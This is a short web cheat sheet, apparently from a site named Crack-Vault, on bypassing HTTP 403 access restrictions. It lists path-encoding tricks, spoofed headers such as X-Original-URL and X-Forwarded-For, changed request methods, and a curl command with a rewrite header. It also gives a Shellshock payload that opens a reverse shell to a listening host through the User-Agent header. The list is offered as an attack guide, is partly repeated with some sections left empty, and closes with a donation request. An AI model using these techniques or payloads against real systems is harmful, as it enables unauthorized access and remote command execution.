How to bypass 403 Errors Technique number 1 Appending {%2e} or {%2f} { **/*, /./} after the first slash https://www.domain/DB = 403 https://www.domain/%2e/DB ] =200 https://www.domain/./DB ] =200 Technique number 2 Adding headers to requests module. Content-Length: 0 X-rewrite-url X-Original-URL X-Custom-IP-Authorization X-Forwarded-For Technique number 3 Change the request method GET → POST GET → TRACE GET → PUT GET → OPTIONS Technique number 4 Using Curl curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’ https://account.domain.com/ ' Technique number 5 Brute force sub directory from the 403 directory Try using (wordlist/dirb/comon.txt) Setup Netcat lisener Inject parameters from Curl or Burp Suite CURL ---> curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi Burp Suite ---> Change User-Agent: () { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1

Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

403 Bypass

Technique number 1

Appending {%2e} or {%2f} { **/*, /./} after the first slash
- https://www.domain/DB = 403
- https://www.domain/%2e/DB] =200
- https://www.domain/./DB] =200

Technique number 2

Technique number 3

Change the request method
- GET → POST
- GET → TRACE
- GET → PUT
- GET → OPTIONS

Technique number 4

Using Curl
- curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’https://account.domain.com/'

Technique number 5

📱